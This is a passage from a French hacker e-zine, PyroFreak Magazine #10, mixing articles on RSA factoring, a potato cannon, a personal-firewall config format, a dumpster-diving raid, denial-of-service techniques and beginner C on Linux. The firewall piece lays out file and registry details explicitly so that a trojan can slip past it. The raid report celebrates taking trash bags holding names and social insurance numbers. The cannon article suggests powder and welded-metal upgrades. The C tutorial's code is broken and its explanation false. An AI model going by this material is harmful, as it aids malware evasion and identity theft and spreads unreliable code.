n21+l 2 n22+l 3 n23=0 mod 2 (problème de résolution de système dont on sait trouver des solutions) l 1 n31+l 2 n32+l 3 n33=0 mod 2 on trouve donc les solutions: l 1=... ; l 2=... ; l 3=... tel que (N- a1²)l1*(N-a2²)l2*(N-a3²)l3=a ² puis en utilisant les calculs de modulo on obtient: (a1l1*a2l1*a3l1)² = a ² mod N finalement en posant, X = a et Y = a1l1*a2l1*a3l1 on retrouve alors Y²-X²=0 mod N On a donc trouver X et Y pour que N | Y²-X² COMMENT DETERMINER LES pi ET ai ? On se fixe tout d'abord une base de facteurs premiers {p1=2, p2=3, p3=5, p4=7, ...}. Ces entiers sont considérés comme des nombres premiers 'simples'. C'est-à-dire qu'ils sont par exemples calculables ou contenus dans une base de donnée. On peut décrire la recherche des entiers pi et ai par l'algorithme suivant: · On calcul : m=E( racine(N) ) ; on peut alors calculer les ai=(m+i) dont le carré est voisin de N. |N-an²| < d · On fixe c ( le crible ) un entier naturel. On calcul le résidu R avec R=N-(m+i)² et on fait varier i dans des valeurs entières de -c à +c · On divise (tant que c'est possible) R par p1, p2,... pour obtenir une factorisation de R. On obtient une égalité du type recherché : N-a1²=p1n11*p2n21*p3n31*... On pourrait croire que l'on factorise des nombres de grandes tailles en cherchant à factoriser N-a1². Mais en fait, il faut bien voir que les nombres manipulés sont de l'ordre de racine(N) donc 2 fois plus petit (au niveau de la taille :) que N ! V- CONCLUSION SUR LE RSA On comprend mieux pourquoi le RSA est l'un des algorithmes de cryptage les plus sûr au monde. Il est relativement facile à implémenter, tandis que les "casseurs de RSA" sont quant à eux très coûteux et très délicats à coder. Par exemple, casser une clé de 140 a nécessité 200 ordinateurs fonctionnant en parallèle durant 4 semaines pour poser les systèmes d'équations (celui des l précédent) et 100 heures de calculs sur un CRAY pour les résoudre. Les créateurs du RSA ont toujours confiances en leur cryptosytème. Il organise d'ailleurs un énorme concours de cassage du RSA. Le but est de trouver les éléments constitutifs du RSA ( p et q ) à partir de N. Actuellement (début 2000), on cherche à casser le RSA-155, c'est-à-dire à 155 chiffres. Les responsables du RSA Data Security recommandent d'utiliser des clés de plus en plus grandes car l'avancés des technologies et des algorithmes permet de diminuer de jour en jour la durée de vie des clés existantes. Ces même responsables mettent en garde les industriels contre qui de grands groupes financiers ou organisation (NSA en première ligne...) auraient les moyens de construire des 'super-calculateurs' pour décrypter les données sensibles. RSA-155 constitue une véritable étape dans la cryptographie. Car codé en 512 bits, le RSA-155 est véritablement utilisé par les banques... Le cassage du RSA 155 remettra en cause la plus part des méthodes de cryptage des organismes. On estime à quelques mois le cassage du RSA 155. On sait hors et déjà que le prochain challenge sera le RSA-160. Exemple de machine "casseuse de RSA": TWINKLE (créé en 1999) est le nom donné à la machine censé aidé la factorisation des nombres premiers. Son créateur est Adi Shamir, il estime sa puissance de calcul équivalente à 1000 Pc actuel (pour un coût de 30 000 Frs). Cette machine serait capable de casser des clés publiques de 512 bits (TWINKLE travaille à 10 GHz). Le principe de cassage de cette machine consiste à trouver l'inverse d'un calcul modulaire. On a vu que W = MC mod N. Elle cherche des solutions de calcul de racine C-ième de W. C'est-à-dire les solutions envisageables de W-C = M mod N. Une tel méthode permettrai de factoriser un RSA-140 en environ 10 jours (d'après les créateurs) et un RSA-155 en à peine 10 semaines.... Voici à titre illustratif les prédictions d'une telle machine en ressource mémoire (chiffres pris de www.rsa.com) Taille de la clé (en bits) Nombre de facteurs premiers déjà connue Mémoire utilisé Mémoire lié aux équations 428 600 ko 14 Mo 128 Mo 465 1.2 Mo 64 Mo 825 Mo 512 3 Mo 128 Mo 2 Go 768 240 Mo 10 Go 160 Go 1024 7.5 Go 256 Go 10 To ! ANNEXE MATHEMATIQUES Calcul Modulaire A = B mod C équivaut à dire que B est le reste de la division euclidienne de C par A. On lis A égale B modulo C. 10 = 2 mod 8 car 10 = 1*8 + 2 6 = 0 mod 3 car 6 = 2*3 + 0 Nombres premiers et premiers en eux Un nombre est premier s'il est divisible seulement par 1 et par lui même. Les nombres premiers nous servent entre autres pour déterminer la clé publique N. 7 est premier car divisible seulement par 1 et par lui même. Deux nombres sont premiers entre eux si le seul diviseur commun entre eux est 1. Cela permet de calculer la clé de cryptage C. 10 et 9 sont premiers entre eux. Car leurs seuls diviseurs commun est 1: 10 = 2 * 5 et 9 = 3 * 3. Deux nombres premiers entre eux ne sont pas forcement premiers eux même ! Comme le montre l'exemple précédent: 10 et 9 sont premiers entre eux sans être premiers. REM: TOUT nombre entier est décomposable en produit de nombres premiers. 16473 = 3 * 17² * 19 (on dis que l'on a factorisé 16473) 8427 = 3 * 53² Inverse Modulo B = A-1 mod C reviens à trouvé un couple ( A , X ) tel que B*A + C*X = 1 Comme 3*4 - 1*11 = 1, on a donc 3 = 4-1 mod 1 Il existe un théorème qui dis que si A et B sont premiers entre eux alors on peut trouver U et V tel que: A*U + B*V = 1. Cela est important pour calculer la clé D de décryptage. PGCD (plus grand diviseur commun) Le pgcd représente le plus grand diviseur commun de deux nombre. pgcd ( 5 , 15 ) = 5 car 15 = 3 * 5 pgcd ( 8 , 18 ) = 2 car 8 = 2 * 4 et 18 = 2 * 9 Algorithme d'Euclide Il permet de résoudre l'équation d'inconnu ( X , Y ): X * A + Y * B = 1 dans le cas où pgcd( A , B ) = 1 (c'est-à-dire les cas où A et B sont premiers entre eux) Si A = B mod C alors PGCD( A , B ) = PGCD ( B , C ) Résolution de X*123 + Y * 23 = 1 123 = 5 * 23 + 8 donc ici 125 = 8 mod 23 23 = 2 * 8 +7 8 = 1*7 + 1 d'où: 1 = 8 - 1 * 7 = 8 - 1* (23 - 2*8) = 3 * 8 - 23 = 3 * (123 - 5*23) - 23 = 3 * 123 - 16 * 23 on a donc trouver une solution de l'équation: X*123 + Y * 23 = 1 Ces équations interviennent souvent pour le calcul de D, ou pour remonter le calcul des clés N, D et C. Optimisation du calcul modulaire Cette section n'est destinée qu'à ceux qui voudraient implanter sur machine le RSA. Etant donné que les nombres manipulés sont de très grandes tailles (plusieurs centaines de chiffres). Il est impossible de représenter MC lors du calcul de MC mod N. En effet, si M = 466345346434123423343463465645 et C = 7876856745342352355645767856785634. Il est très maladroit de calculer MC en multipliant M, C fois et ensuite de calculer le modulo ( le nombre MC représente un nombre de 1033 chiffres, c'est-à-dire 1 million de milliard de milliard d'octet....). C'est pourquoi, on emploie plutôt une méthode qui permet de calculer d'un coup MC mod N. Pour comprendre cette algorithme, il faut juste savoir que si A = B mod C et X = Y mod C alors A*X = B*Y mod C. Explication de l'algorithme de calcul de MC mod N On décompose C en base 2 comme suivant C=S ( d i 2i ) avec d i =0 ou 1 Donc, MC=P Md i 2^i=Md 0 *(Md1)2*((Md2)2)2*(((Md3)2)2)2*... On calcul successivement : a i=(Mdi)2^i mod N et on aura alors MC=P (a i) mod N Algorithme : La variable r contient la valeur P (a i) ; calculer au fur et à mesure. Tant que C>0 Si (C mod 2)=1 alors M*r mod N ® r {Calcul de M^2^2^2^... mod N} C div 2 ® r {Décomposition de C en base 2} M*M mod N ® M {Calcul de M^2 mod N} Retourner r version 1.2 - 2000 Pour toutes questions, commentaires, critiques, erreurs: sabrina@inorbit.com ____ __ **1er Anniversaire**_ _______ ________ __PyroFreak Magazine #10 | 15-Autres éléments sur l'emetteur télé du #9 |( ) Phreak ( ) Hack (X) Autres '.__________Par Cyberdollar ________ cyberdollar@caramail.com ______ ___ Ayant trouvé l'article de Skywalker sur l'emetteur TV trés bon j'ai essayé (Cyberdollar) d'ajouter ce que je connaissais également sur le sujet, disons que c'est un complément sur l'article de Skywalker mais tout le mérite lui revient !! 1) LES BRANCHEMENTS D'UNE PRISE PERITEL : Ce truc ne sert pas à grand chose mais ce sont quelques-une de mes connaissances des prises peritel : ,-------------------------------------------, \ 20 18 16 14 12 10 08 06 04 02 | \ | | 19 17 15 13 11 09 07 05 03 01 | '------------21---------------------------' 1 Sortie Audio Droite 2 Entrée Audio Droite 3 Sortie Audio Gauche 4 Masse Audio 5 Masse Bleu 6 Entrée Audio Gauche 7 Entrée Vidéo Bleu 8 Entrée Commutation lente ou status 16:9 9 Masse Vert 10 Non connecté 11 Entrée Vidéo Vert 12 non connecté 13 Entrée Vidéo Rouge 14 Masse commutation 15 Entrée Vidéo Rouge 16 Entrée Commutation rapide * 17 Masse Sortie Vidéo 18 Masse Entrée Vidéo 19 Sortie Vidéo 20 Entrée Vidéo 21 Masse commune du blindage AUTRES FREQUENCES : Il existe une autre frequence que Skywalker n'a pas mis dans sa liste... C'est un emmetteur frontalier susceptible d'être recu à proximité de la frontiére : LUXEMBOURG : bande III (Contrairement à la bande U en France) TF1 : E7 - F2 : E21 Au passage.....faites gaffes : le risque zero n'existe pas !! ____ __ **1er Anniversaire**_ _______ ________ __PyroFreak Magazine #10 | 16-Le PATATOR |( ) Phreak ( ) Hack (X) Autres '.__________Par Mastermind ________ anakin_vador@hotmail.com ______ ___ 1-Introduction Le patator est un canon en PVC projetant des pomme de terres ,œufs et petits suisses dans un rayon de 100 mètres a l 'aide de butane , gaz utilisé dans la plupart des aérosols (laque, déo…) Le Patator a été présenté en 1998 par Thierry Lhermitte sur la chaîne câblée COMEDIE. Le Patator n' est nullement un objet coûteux et difficile a réaliser, sa fabrication est tres simple et j'encourage quiconque a essayer. Son prix d' a peu près 100 FF peut paraître cher mais la facilité d'utilisation et le fun procuré en vaut largement la chandelle. Le patator est un sport voué a se developper pour les prochains jeux olympiques il est très pratique (bien que peu portable ) mais garanti une une grande utilité , de plus il est presque incassable en raison du pvc solide le constituant. 2-Materiel a acheter en magasin de bricolage (batkor…) -1 tube en pvc diamètre 100millimetre longueur 80 centimètre chambre de combustion) -1 tube pvc diam. 40 ou 50 mm longueur de 0.4 m a 1m (canon) -2 manchons pvc diamètre intérieur 100mm -1 bouchon a vis diam. 100mm - réducteur passant du diam. 100mm au diamètre 40 ou 50mm (comme le canon) - De la colle pvc - Du papier de verre - Quelque chose pour dégraisser (acétone, alcool a brûler , mir vaisselle) - Un bout de grille fine - Dispositif d'allumage (voir plus loin) - Pomme de terres (duh !) 3-Realisation Avant collage le pvc doit être poncé puis dégraissé Coller des 2 cotés de la chambre de combustion le pas de vis et le réducteur. Le canon peut être fixé au réducteur par du velcro mais il peut être mieux de ne pas le fixer au début ( cela fait fusible et empêche l' explosion) une grille peut être ajoutée pour empêcher la pomme de terre de tomber dans la chambre de combustion. Le système d' allumage est la chose la plus dure à faire fonctionner, on peut en distinguer plusieurs sortes (la portée du patator dépend directement de l' étanchéité du trou d allumage) : a) Allumage classique Percer un trou de 8-10mm dans la chambre de combustion . a partir de la on peut allumer de 2 façons avec une mèche (ficelle imprégnée d' essence) mais cela n'est pas pratique et salit le patator. Plus pratique est l'allumage via un allumeur a gaz « a flamme » (allumeur de gazinière, sorte de tige allongée avec un briquet au bout) mais faire attention a ne pas s 'allumer la gueule avec ! Malheureusement ces allumages laissent un trou non bouché ce qui diminue le rendement. La « voie royale » pour allumer le patator est : b) Allumage « piezo électrique » Tout simplement un dispositif destiné a faire une étincelle (arc électrique ) pour allumer des fourneaux ou briquets. Il existe une règle : plus c'est gros mieux c'est ! Les allumeurs de briquets sont franchement faiblards , les allume fourneaux sont assez bien , mais la « Rolls » des allumeurs reste l'allumeur de chaudière surpuissant. Les avantages d'un allumeur puissant sont de pouvoir mettre de la rallonge (allumer a 3 mètres c'est plus sécurisant !) et d'avoir une combustion immédiate (pas de galère) . Pour introduire les électrodes de l'allumeur on peut faire un trou de 9-10mm dans la chambre de combustion et etancheifier a la patafix ou faire juste des petits trous pour laisser passer les fils. Les électrodes d' allumage (endroit ou l étincelle se produit ) sont 2 fils denudés ou l'électrode d' origine ou bien un système constitué avec un « domino »(sucre) et 2 aiguilles. Attention dans certain cas la pulvérisation de laque sur les électrodes empêchent l étincelle de se produire. 4-Utilisation découper la patate en l'enfonçant dans le canon (il peut être ajusté a cet effet) la patate doit être bien ajustée :trop petite=pas d'étanchéité ;trop grande = résistance a l'avancement , voire explosion de la chambre ; la patate doit coulisser « gras » dans le canon. Assembler le canon dans le réducteur. ouvrir le couvercle puis vaporiser de l'aérosol dedans ( j' utilise de la laque pour cheveux bon marché) sachant que le butane « coule » dans l'air. La pulvérisation doit durer un peu moins de 2 secondes (3-4 pschit). Revisser rapidement. Durant les premiers allumages je conseille d'allumer a distance (rallonge de fils ) sur un support fixe après un peu d expérience le tir sur l' épaule pourra être envisagé L ' allumage peut ne pas bien marcher , vérifier l étincelle et/ou mettre plus de gaz(une fois réglé le patator marche a tout les coups). Le lancement est accompagné d 'un grand bruit la patate vole très loin et peut se pulvériser contre un mur. 5-Optimisation idées a développer pour optimiser le patator : -allumeur puissant -chambre de combustion avec plus de volume -canon long (strié ?) -meilleur carburant (poudre ??) -patator en métal soudé (possibilité de mettre plus de pression) -patator a propulsion magnétique (ensemble d electro aimants pour envoyer des objets métalliques a grande vitesse) 6-Conclusion Voilà de quoi procurer de grandes heures d' amusement . vous pouvez m' envoyer vos photos animations ainsi qu 'idées pour le develloppement du patator (pourquoi pas un site sur le TUNING du patator). Si vous souhaitez obtenir des photos conseils films numeriques MPEG ficuier patator 3dsmax contactez moi essayer de devellopper au mieux ce sport !!!!! ANARCHY RULEZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZ ____ __ **1er Anniversaire**_ _______ ________ __PyroFreak Magazine #10 | 17-NetAppGuard |( ) Phreak ( ) Hack (X) Autres '.__________Par KAiAPhAS ____ ________ goth.goth@caramail.com ______ ___ Pour commencer, c'est un programme qui controle tous les programmes qui ont un accès à internet afin de repérer les trojans plus facilement. On peut le trouver sur www.jcrun.com. *** Fichiers : ** C:\WINDOWS\NAGWIN.EXE C'est le programme en lui même éxécuté automatiquement au démarrage. ** C:\WINDOWS\NAGCFG.DAT C'est les données concernant les progs acceptés et refusés, c'est ce fichier qui nous interesse. *** Base de registre : ** HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run Clé : LoadNetAppGuard="c:\windows\nagwin.exe" ** HKEY_USERS\DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run Clé : LoadNetAppGuard="c:\windows\nagwin.exe" *** Données : Le programme est limité à 100 programmes acceptés et 100 programmes refusés. Chaque chemin est limité à 255 caractères. ** Programmes acceptés : Ils sont dans les 25 premières lignes. il y en a un tous les 256 caractères et chaque ligne contient 1024 caractères ça fait donc 4 programmes par ligne. Ils sont séparés par des espaces. * 1er caractère : correspond au code ASCII du nombre de caractères de la chaine ki le suit et ki contient le chemin du programme accepté. * Chaine de caractères : elle contient le chemin du prog. * Espaces vides : ils sont là pour combler afin d'avoir un bloc de données bien ordonné qui fait toujours la même taille. ** Programmes refusés : Ils sont positionnés exactement de la même manière que les programmes acceptés mis à part le fait qu'il sont placés à partir de la 26ème ligne. Le but de ces infomations est de créer un trojan qui se registrerait avant que le programme ne détecte la présence d'un protocol. La difficulté est que le fichier nagcfg.dat est constement ouvert et qu'il ne peut par conséquent pas être modifié à moins d'obliger le programme à le fermer pendant un court instant... Avis aux programmeurs... ____ __ **1er Anniversaire**_ _______ ________ __PyroFreak Magazine #10 | 18-Trashing Report |( ) Phreak ( ) Hack (X) Autres '.__________Par Endrix________ ________ lordendrix@hotmail.com_____ ___ ! ! ! ! ! ! ! ! ! ! ! !! ! ! ! ! !! ! ! ! ! !! ! ! ! ! ! ! ! ! ! ! ! ! ! ! ! ! ! ! ! ! ! !!!===================================!!! ! [Trashing Report] !! !!===================================!! !===================================! !!Dans la nuit du 29-30* Février 2000!! !==================================! Document écrit par endrix- Qui?: endrix-, Tekrebel, Vip0|a, System_exe, Kev0rkian Destination?: #1, Luxembourg, #2, Cartier industriel à Hull, Vidéotron Heure?: de 12h00pm à 2h30am Bon, il est 11h00 et je dois aller au Vidéo Super Choix. J'attend, j'attend, oh... Kevorkian arrive et j'embarque avec lui :) En arrivant au luxembourg à Gatineau, il avait system_exe, tekrebel et vip qui nous attendais dehors so après avoir fait les présentations, on est allé à l'intérieur et on a parlé de tout et de rien. Cependant il avait un petit manque d'alcool qui a été très rapidement comblé(prochain fois les boyz, on s'amène plus d'argent..). Pas longtemps après, tout le monde est ami et les discussions s'en vienne de plus en plus profonde, moi et tekrebel parlons de théorie pour notre cégep, vip tant la tête de tout bord tout côté pour entendre TOUT!!! Kevorkian et parle de tout et de rien aussi. Après avoir parcourus tout les sujets possibles, nous partons tranquillement direction Cartier Industriel à Hull. Cependant une chose manquait... ohh excusez, kevorkian vient de l'allumer... Hey oui, encore une odeur d'herbe de jouvance pour nous redonner l'espoir de trouver tout plein de belles choses :) Arrivé, nous regardons tranquillement pour voir si personne est la, ou si les copz nous attendes pas(on sais jamais). On trouve une place pour stationner. Tout le monde sors, on prend nos lampes de poches, on s'habille le plus noir possible(oui vip, ton manteau blanc est trop évident). La marche commence... Nous passons par une place entre 2 immeubles qui donne aux trésors de vidéotron. Nous pensons à ou pourrait être les caméras, comment s'y prendre ou aller... Après quelque moment, moi et Tekrebel décidons d'y aller. Alors on va ce réfugier en arrière des 2 vannes à la protection tes lumières et caméras et les autres après suivent. Je vais voir pour prendre un sac(en attendant, kevorkian, system_exe et tekrebel font le guet et le vipola est resté en arrière pour le guet à distance avec sont beau Cache-cou mit comme une tuque ROUGE! Peut après je reviens disant qu'il faut que quelqu'un vienne avec moi parce les sacs sont trop dans le fond et j'ai besoin d'une personne pour soulever le couvercle en attendant que j'entre dans la poubelle et que je prend un sac. Tekrebel ce porte volontaire pour venir avec moi m'aider voyeusement ancïeux de savoir ce qu'on va trouver. Tekrebel ouvre le couvercle, j'entre dans la poubelle, je prend le sac et on ce sauve en courrant :) On s'enva à l'auto, tout le monde entre et Tekrebel nous attend avec le sac dans les bras(euhh oui madame, c'est un projet de recherche écologique pour l'école que nous fesons..). On arrive, il entre le sac dans le char et on DÉCRISS!!! Arrivé au "spot" de déballage, tout le monde sors et on regarde voir ce qui est bon ou pas. On reste pas trop longtemps la parce que c'est proche du park et la GRC comment vous savez, c'est eux la police du park de la gatineau et ils passent souvent pour voir si le monde font des conneries. Après avoir tout prit ce qui était bon, on a finallement arrêter au Tim Horton pour tout regarder concrètement ce qu'il y avait. Des noms, addresse, numéro d'assurance social, quelques users mais pas de #cc :( C'est ainsi que c'est terminé la soiré du 29 au 30*. Si vous habitez en Outaouais et vous aimeriez nous joindre c'est possible maintenant, on pourrait y aller une gange de personne j'ai un chum qui voudrait venir et qui a une vanne de 11 places so on a en masse de place pour du monde. Simplement vous informer c'est quand le prochain Meeting et ou a une des personnes suivantes : endrix - System_exe - Tekrebel - Vip0|a - Kev0rkian - Neuro Ou juste par email = lordendrix@hotmail.com Via IRC = Undernet, #pyrofreak Via HTTP = Http://www.pyrofreak.org Je tiens aussi à remercier kev0rkian qui s'est offert cette fois pour conduire... On va te remettre ca dude :) endrix-(http://endrix.usuck.com) ____ __ **1er Anniversaire**_ _______ ________ __PyroFreak Magazine #10 | 19-DoS, wtfit (what the fuck is that)? |( ) Phreak (X) Hack ( ) Autres '.__________Par Tekrebel ________ tekrebel@vl.videotron.ca ______ ___ Introduction Avec les événements des derniers mois, j'ai décidé d'écrire un petit article pour expliquer en détails ce que sont les denial of service attacks et la façon dont elles fonctionnent. Tout le monde a surement entendu parler des sites Yahoo, CNN, Amazon, Buy.com et j'en passe, qui ont été victime d'un DoS. Par exemple, Yahoo a reçu 1 gig/s de données à un moment donné, ce qui a provoqué comme vous vous en doutez, la saturation complète de la bande passante. Aucun usager ne pouvait se connecter au site. Qu'est-ce qu'un DoS et pourquoi? Comme le nom l'indique, un denial of service attack vise à empêcher un serveur ou une machine d'offrir des services aux utilisateurs. On peut accomplir ceci de plusieurs façons, entre autre en saturant la bande passante, en exploitant un bug sur la machine et en la faisant "planter". Plusieurs logiciels (communément appelés nukes) ou exploits nous permettent ceci. Exemple: teardrop, land, winnuke, smurf, pawk, pimp, et bien d'autres. J'expliquerai le fonctionnement général de ces programmes un peu plus tard. Le pourquoi des DoS est assez évident pour les compagnies, spécialement les commerces électroniques. Quand le serveur ne peut offrir de services, la compagnie pert de l'argent. Prenons un petit scénario exagéré mais quand même plausible. Une compagnie X, disons Pyro-Bay Inc., veut se lancer dans le commerce électronique, plus précisément dans les enchères on-line. Malheureusement, le marché est présentement occupé à 90% par son concurrent, EBay. Pyro-Bay décide donc d'engager et de fournir le matériel et les connections nécessaires à un groupe de hackers professionels. Ces hackers sont vraiment des pros et ne se feront pas retracer. Les hackers ou crackers (appelez les comme vous voulez), procèdent donc à l'implantation de distributed attack trojans sur plusieurs centaines de machines sur une période de trois mois. Ensuite, ayant bien planifiés leur attaque, ils donnent le signal aux machines infectées de flooder ebay.com avec des paquets icmp, udp, tcp et autres. Ce qui suit est désastreux pour EBay, le site est inaccessible aux clients pendant 2 semaines, les hackers étant très bien préparés. Imaginez, l'argent que pert EBay pendant ces deux semaines. En plus, Pyro-Bay décide de coordonner sa campagne de publicité massive en même temps que les attaques. Coincidence? :) Avec les protocoles et l'architecture d'internet actuelle, toute compagnie ou organisation possédant la motivation et les ressources nécessaires, peut faire tomber à peu près n'importe quel site indéfiniment. Le FBI vous dira qu'ils ont développé plein de techniques pour retracer les auteurs de ces attaques, c'est seulement vrai dans la mesure où les attaquants commettent des erreurs stupides et ne sont pas professionels. L'internet est une cible de choix pour ce type d'attaque, plus facile à effectuer en général que hacker un serveur. Quels sont les types de DoS? Je vais tenter de faire un résumé des principaux types de DoS. On les regroupe en deux catégories d'habitude: les DoS locaux ou remote (externe). C'est-à-dire, dans le cas d'un remote, le DoS s'effectue à partir d'un ordinateur externe au réseau. Dans le cas de celui local, il s'effectue sur le serveur comme tel, avec un compte sur la machine habituellement. Attaques à distance (remote) - ICMP flood C'est un des types de DoS les plus facile à exécuter, il s'agit seulement d'avoir une connection internet plus rapide que celle de la victime. ICMP (internet control message protocol), est un protocole de communication utilisé pour le diagnostic des erreurs et ne requiert pas de connection. Dans ce type d'attaque, on forge des paquets avec une adresse source différente (ou au hasard) et on les envoit à notre cible. En saturant la cible avec des paquets de 64k ou une multitude de plus petits paquets, la machine à l'autre bout ne peut plus répondre aux demandes de connections légitimes des utilisateurs ou clients parce que toute la bande passante est utilisée. On utilise la plupart du temps un paquet ICMP de type echo-request (ping) parce que le serveur qui reçoit ce paquet doit y répondre avec un echo-reply (pong). Il est possible de diminuer l'impact en deux de cette attaque en configuration un firewall pour bloquer les paquets ping mais certains services de diagnostics peuvent être affectés et si l'attaquant possède plus bandwidth, la machine est encore saturée. Il existe une variante très puissante à cette attaque, il s'agit du smurf. Non, ce n'est pas une attaque de petits bonhommes bleus. En fait, pour résumer rapidement, avec le smurf, on génère beaucoup plus de traffic que notre connection le permet. Le smurf se base sur le fait que certains routeurs sont mal configurés et répondent à un ping par un nombre de pong égal au nombre de machines dans le subnet. Par exemple, si on a un routeur avec 50 machines derrière celui-ci, avec disons un bandwidth illimité et qu'on envoit pour 100k/s de ping, le routeur répondra avec 50x100k/s de pong, c'est à dire 5 meg/s. Une T1 ou un câble modem tombe facilement devant ce type d'attaque. C'est ce type de DoS qui a été employé contre Yahoo, combiné avec un DDoS (Distributed Denial of Service). Les flood d'ICMPs sont assez difficiles à retracer puisque l'adresse source des paquets est forgée. - SYN flood Avant d'expliquer le SYN flood, il faut expliquer la base d'une connection TCP. Quand on initie une connection en TCP, on envoit un paquet SYN au serveur, qui lui nous répond avec un ACK et nous par un SYN/ACK ensuite. C'est ce qu'on appele le 3way handshake. Le problème se situe dans le fait qu'un serveur va attendre le SYN/ACK un certains nombre de secondes avant de libérer le socket. En falsifiant l'addresse source de notre paquet SYN, on peut envoyer quelques dizaines de paquets forgés et remplir la queue de connection de la victime. Celle-ci ne peut donc plus accepter d'autres connections avant que la queue soit vide. Le nombre de connections et le temps d'attenre avant un reset varie d'un serveur à un autre mais la queue n'est jamais très longue (entre 10 et 20 environ). Alors, on n'a pas besoin d'avoir beaucoup de bandwidth pour effectuer cette attaque puisqu'il faut juste envoyer une vingtaine de paquets à un intervalle correspondant au temps d'attente avant un reset de la connection. Plusieurs fournisseurs Internet ont été victime de ce type d'attaque, en particulier Panix.com qui a été hors d'usage pendant 2 semaines suite à un SYN flood. - Les "nukes" Tout le monde doit connaître le célèbre programme winnuke, qui fait (ou plutôt qui faisait) planter les machines windows. Envoyer un nuke consiste à envoyer un certains types de paquet, qui est mal géré par le système d'exploitation et qui fait planter celui-ci. Ce type d'attaque exploite donc un bug dans le OS. C'est pour cette raison que d'habitude, ce type de DoS ne fonctionne pas très longtemps parce que des patchs sont émis assez rapidement. Des exemples de nukes: teardrop, land, igmp. - Les bugs dans les programmes On peut également faire planter seulement certains services sur des ports si ceux-ci comportent des bugs, des buffer overflow notamment. Dans le cas d'un buffer overflow, on se connecte sur un des ports et on envoit plein de caractères, ce qui fait déborder le buffer et planter le programme. Il est également possible d'exécuter des commandes au niveau root avec un buffer overflow mais c'est une autre histoire. Par exemple, il y a un bug dans une version de war-ftp qui fait que quand on entre un username de plus de 255 caractère, war-ftp plante. Une autre variante de ce type d'attaque mais au niveau hardware se retrouve chez les vieux modems où en envoyant un ping avec ath+++ et un paramètre demandant à la victime de retourner le pong avec l'information contenue dans celui-ci, cause la déconnection du modem. ath+++ est la commande utilisée pour se déconnecter avec un modem. Vous voyez le principe? On peut faire déconnecter n'importe qui qui a ce type de vieux modem. Il y a une liste quasi illimitée de ce type de bugs, regardez à http://www.attrition.org/security/denial/ Attaques locales - Les forks Plutôt reconnu sur les plateformes UNIX, ce DoS consiste à créer une multitude de process sur la machine afin de consumer toutes les ressources disponibles et ralentir l'ordinateur. Un bon forker, tel superforker, empêche même l'admin de liste le contenu d'un répertoire ou d'exécuter n'importe quelle commande de base. La parade à ce type d'attaque est relativement simple, il s'agit de limiter les usagers du serveur à un certain nombre de process. D'habitude, un usager normal ne devrait jamais dépasser une centaine de process à la fois. - L'espace du disque dur Cette attaque peut également s'effectuer à distance, avec des cgi-bin scripts qui écrivent sur le disque dur par exemple. C'est très simple, il s'agit de remplir le disque dur de notre ennemi avec plein de cochonneries. Bien que l'administrateur peut mettre des quotas sur les usagers, certains bugs dans des programmes roulant en UID0 ou au niveau admin permettent d'exploiter cette faiblesse. Il faut aussi se souvenir que la plupart des systèmes de fichiers, si non tous, utilise un certain minimum d'espace sur le disque pour stocker n'importe quel fichier. Par exemple, sur Linux, la grosseur d'un inode par défaut est 4096 bytes si je me rappele bien. Alors, si nous créons 1000 petits fichiers de 1 byte de long, ils utiliseront quand même 1000 x 4096 bytes, c'est- à-dire 4,096,000 bytes. Ceci permet de remplir un gros disque assez rapidement puisque l'on a pas à écrire quelques gigs pour remplir un disque de 20 gigs. Le programmes mal configurés qui log (comme les firewalls), sont souvent la cause d'un remplissage de disque quand un attaquant provoque délibérément des messages d'erreurs afin de remplir un disque. Conclusion Bon, j'espère que cet article vous a plu sinon too bad, vous venez juste de waster 5 minutes de votre vie. Je crois que j'ai fait le tour des DoS dont on entend le plus parler. Restez à l'écoute des nouveaux DoS car ils en sort à la tonne alors si vous avez un serveur connecté à Internet, il serait bon de vérifier si votre machine est bien configurée pour éliminer ce type d'attaque. Je n'ai pas parlé de chaque DoS en particulier parce que sinon on serait encore là dans 3 semaines alors ne venez pas me bugger que je n'ai pas parlé de winnuke version 2.4 lamer edition. ____ __ **1er Anniversaire**_ _______ ________ __PyroFreak Magazine #10 | 20-Initiation au C sous linux |( ) Phreak ( ) Hack (X) Autres '.__________Par Putois ____ ________ asmbeginer@multimania.com ______ ___ 1] Comment faire des programmes du type: myprog hello On vois beaucoup sur le web des programmes C,avec plusieur options par exemple les scanners de ports ou la syntaxe est: portscan : #include void main(int argc,char *argv[]) { int test; if (argc < 2 ) { printf("usage: exemple test",argv[0]); exit(-1); } if (!(test)) { printf("this ok"); exit(-1); } } Cette ligne if (!(test)) demande au compilateur de retourner sous le shell et de voir si on a taper la commande test . A noter que chaque fonctions que l'on veut rajouter doit être initialiser par un type INT au debut du code. Compilation:cc -o exemp exemp.c Execution: bash#> ./exemp test if (!(test)) { printf("this ok"); exit(-1); } Un autre exemple: #include void main(int argc,char *argv[]) { int test; int test2; int test3; if (argc < 2 ) { printf("usage: exemple test",argv[0]); exit(-1); } if (!(test)) { printf("this ok"); exit(-1); } if (!(test2)) { printf("test 2 this ok"); exit(-1); } if (!(test3)) { printf("test 3 this ok"); exit(-1); } } Compilation:cc -o exemple2 exemple2.c Usage: ./exemple2 test marquera this ok a l'ecran Usage: ./exemple2 test2 marquera test2 this ok a l'ecran Usage: ./exemple2 test3 marquera test3 this ok a l'ecran 1.2] Les branchements sélectifs avec SWITCH Le but de la fonction Switch est de permettre de travailler avec plusieurs fonctions Void. Principe: #include #include #include main(){ } void essai() { } void test() { } Programme qui ne sert à rien sauf qu'a démontrer l'algorythme simple pour créér ses propres VOID. Afin de pouvoir appeller la sous fonction essai() le SWITCH doit etre créé à l'intérieur de main(): main(){ char c; switch(c){ default: fprintf(stderr,"Usage: -a -b\n"); exit(2); } } A son éxécution ce programme marquera: Usage: -a -b,le but de cet exemple et de faire un code de type: ./exemple3 -a .La sous fonction essai() doit être initialiser au début du source avant la fonction main() Le programme se transforme donc comme ceci: #include #include #include void essai(); main(){ char c; switch(c){ case 'a' : essai(); /*appel dela fonction essai()/* break; default: fprintf(stderr,"Usage: -a -b\n"); exit(2); } } void essai() { } void test() { } 2] Une tentative pour simplifier la commande chmod L'idéal serait de créer un programme avec divers fonctions pour simplifier la lourd commande CHMOD L'exemple 4 nous démontre comment utiliser la programmation des i-noeud, il créér un répertoir /test dans le directory courant: #include #include main(){ mode_t mode; mode = S_IRUSR|S_IWUSR|S_IXUSR|S_IXGRP|S_IRGRP|S_IROTH|S_IXOTH; if(mkdir("test",mode) == -1); perror("Creation:"); } 